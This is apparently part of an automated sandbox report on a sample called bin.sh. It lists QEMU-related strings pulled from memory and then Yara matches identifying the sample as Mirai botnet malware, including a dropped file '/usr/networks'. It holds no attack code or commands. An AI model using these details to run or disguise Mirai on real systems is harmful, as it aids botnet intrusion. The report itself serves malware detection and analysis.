Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/tcg-op.cUnrecognized operation %d in do_constant_folding.
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_absorb_qdict
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/syscall.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/json-lexer.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: %s/qemu-open.XXXXXX
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_loc_restore
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_foreach
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/thunk.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: module_load_file/build/qemu-tYeErX/qemu-2.5+dfsg/util/error.cUnexpected error in %s() at %s:%d:
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_set_id
Source: kvm.sh.8.dr	Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/crypto/aes.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_write_full
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_madvise
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: cpu_common_initfncpu_common_parse_featurescpu_common_resetcpu_common_get_memory_mappingcpu_class_initcpu_class_by_namecpu_resetcpu_dump_statisticscpu_dump_statecpu_write_elf64_notecpu_write_elf64_qemunotecpu_write_elf32_notecpu_write_elf32_qemunotecpu_get_memory_mappingcpu_paging_enabledcpu_generic_initcpu_existsRegistering `%s' which already exists
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/exec.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_logfile
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_strtoul
Source: bin.sh, 6821.1.00007ffda3af7000.00007ffda3b18000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_cond_signal
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_append () {
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_event_init
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_number
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_LOG_FILENAME
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_get_thread_id
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: _ZTS16QEMUDisassembler
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_read_password
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /usr/lib/x86_64-linux-gnu/qemu/build/qemu-tYeErX/qemu-2.5+dfsg/util/module.cqemu_stamp_bb41a07c541f07aa6886cb62996d065ebf1fe025Failed to initialize module: %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: usage: qemu-arm [options] program [arguments...]
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_get_local_state_pathname
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_irq_intercept_in
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/oslib-posix.cos_mem_prealloc: failed to install signal handleros_mem_prealloc: Insufficient free host memory pages available to allocate guest RAM
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_set_nonblock
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_get_exec_dir
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: set qemu uname release string to 'uname'
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_STACK_SIZE = %ld byte
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: anyQEMU_STRACEQEMU_RAND_SEED/proc/sys/vm/mmap_min_addrhost mmap_min_addr=0x%lx
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_mutex_unlock_iothread
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/tcg-op.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: invalid keyword '%s'missing : in object pairMissing value in dictkey is not a string in object/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/json-parser.ctoken && token->type == JSON_LCURLYtoken && token->type == JSON_LSQUAREtoken && token->type == JSON_ESCAPEinvalid hex escape sequence in stringinvalid escape sequence in stringtoken && token->type == JSON_KEYWORDh
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_hw_version
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-error.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: tcg_gen_qemu_st_i64
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qstring.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev-properties.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: set the elf interpreter prefix to 'path'set the stack size to 'size' bytesselect CPU (-cpu help for list)sets targets environment variable (see below)unsets targets environment variable (see below)forces target process argv[0] to be 'argv0'set qemu uname release string to 'uname'set guest_base address to 'address'reserve 'size' bytes for guest virtual address spaceenable logging of specified items (use '-d help' for a list of items)write logs to 'logfile' (default stderr)set the host page size to 'pagesize'Seed for pseudo-random number generatordisplay version information and exit-%s %-*s %-*s %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_STACK_SIZE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_id
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_set_bool
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_ether_ntoa
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_set_number
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args=$5
Source: functions.sh0.8.dr	Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: init_qemu_uname_release
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-input-visitor.c
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-x86_64
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: C/build/qemu-tYeErX/qemu-2.5+dfsg/util/unicode.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_thread_atexit_remove
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_mutex_lock
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_mutex_iothread_locked
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_GDB
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_print_help
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_unregister_reset
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_stamp_bb41a07c541f07aa6886cb62996d065ebf1fe025
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qfloat.c
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_event_set
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_LD_PREFIX
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_SET_ENV
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: no user program specified
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_fd_getpagesize
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_real_host_page_size
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qlist.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU: Terminated via GDBstub
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_free_irq
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_LOG
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: print this helpQEMU_GDBwait gdb connection to 'port'QEMU_LD_PREFIXQEMU_STACK_SIZEQEMU_CPUmodelQEMU_SET_ENVvar=valueQEMU_UNSET_ENVQEMU_ARGV0argv0QEMU_UNAMEunameQEMU_GUEST_BASEQEMU_RESERVED_VAQEMU_LOGitem[,...]QEMU_LOG_FILENAMElogfileQEMU_PAGESIZEpagesizesinglestepQEMU_SINGLESTEPrun in singlestep modestracelog system callsseedQEMU_VERSION/etc/qemu-binfmt/armdo_strex/build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/syscall.c*arg_type == (int)STRUCT_rtentry%lx-%lx %c%c%c%c %lx %x:%x %d %512s%08x-%08x %c%c%c%c %08lx %02x:%02x %d %s%s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/cutils.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/nmi.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/json-parser.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/op_helper.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/module.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/mmap-alloc.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/mmap.ch2g_valid(ptr)ret == 0h2g_valid(host_start)h2g_valid(host_addr)target_mremaptarget_mmapmmap_find_vmacore dumpedqemu: uncaught target signal %d (%s) - %s
Source: bin.sh, 6777.1.00007ffda3af7000.00007ffda3b18000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/bin.shLANG=en_US.UTF-8TERM=xtermLANGUAGE=en_USMAIL=/var/mail/rootSUDO_USER=userPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:0.0SHELL=/bin/bashSUDO_COMMAND=/bin/bashSUDO_UID=1000HOME=/home/userUSERNAME=rootCOLORTERM=xfce4-terminalLOGNAME=rootXAUTHORITY=/home/user/.XauthorityUSER=rootSUDO_GID=1000/tmp/bin.sh
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_strtosz
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_VERSION
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_GUEST_BASE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_event_destroy
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_parse
Source: functions.sh0.8.dr	Binary or memory string: # identify_boot_image qemu-cmd
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_from_qdict_1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: could not open gdbserver on port %d
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_to_qdict
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_host_page_mask
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_print
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/cpu-exec.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_mutex_unlock
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_irq_invert
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_parse_fd
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_PAGESIZE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-output-visitor.c
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_daemon
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: You can use -E and -U options or the QEMU_SET_ENV and
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_LD_PREFIX = %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_cond_broadcast
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/rcu.crcu_reader.ctr == 0call_rcurcu_register_thread/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/json-lexer.clexer->state <= ARRAY_SIZE(json_lexer)json_lexer_feed_char
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: attempt to add duplicate property '%s' to object (type '%s')Insufficient permission to perform this operation/build/qemu-tYeErX/qemu-2.5+dfsg/include/qapi/qmp/qobject.hInvalid parameter type for '%s', expected: %sProperty %s on %s is not '%s' enum typechild object is already parentedPath '%s' does not uniquely identify an objectinfo->name != NULL!enumerating_typeschild<struct tmtm_yeartm_montm_mdaytm_hourtm_mintm_sectype->parent_type != NULLtarget_type%s::%s<=info->parent>=size >= type->instance_sizetype->abstract == falseobj->ref > 0==obj->ref == 0Property '.%s' not found!obj || obj->refcntobj->type != NULLobj->type->destroy != NULLstringbooleancontainer/objectschild<%s>invalid object type: %sobject type '%s' is abstractuser-creatablelink<%s>objobj->parent != NULL%s/%spartsDevice '%s' not foundlink%sobject_resolve_path_typeobject_get_canonical_path_componentobject_resolve_linkobject_property_add_childobject_property_get_enumobject_property_get_intobject_property_get_boolobject_property_get_linkobject_property_get_strqobject_decrefobject_property_setobject_property_getobject_property_delobject_property_findobject_property_addobject_finalizeobject_unrefobject_set_propvobject_new_with_propvobject_new_with_typetype_get_parenttype_is_ancestortype_initializeobject_initialize_with_typetype_table_addtype_newtype_register/build/qemu-tYeErX/qemu-2.5+dfsg/qom/container.cparts != NULL && parts[0] != NULL && !parts[0][0]container_get/build/qemu-tYeErX/qemu-2.5+dfsg/qom/object_interfaces.cuser_creatable_can_be_deleteduser_creatable_complete/build/qemu-tYeErX/qemu-2.5+dfsg/crypto/aes.cin && out && keyin && out && key && ivecAES_cbc_encryptAES_decryptAES_encrypt
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_mutex_init
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/rcu.h

Stealing of Sensitive Information:

Yara detected Mirai

Source: Yara match	File source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: bin.sh, type: SAMPLE
Source: Yara match	File source: 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 6821.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 6790.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bin.sh PID: 6777, type: MEMORYSTR
Source: Yara match	File source: /usr/networks, type: DROPPED

Remote Access Functionality:

Yara detected Mirai

Source: Yara match	File source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: bin.sh, type: SAMPLE
Source: Yara match	File source: 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 6821.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 6790.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bin.sh PID: 6777, type: MEMORYSTR
Source: Yara match	File source: /usr/networks, type: DROPPED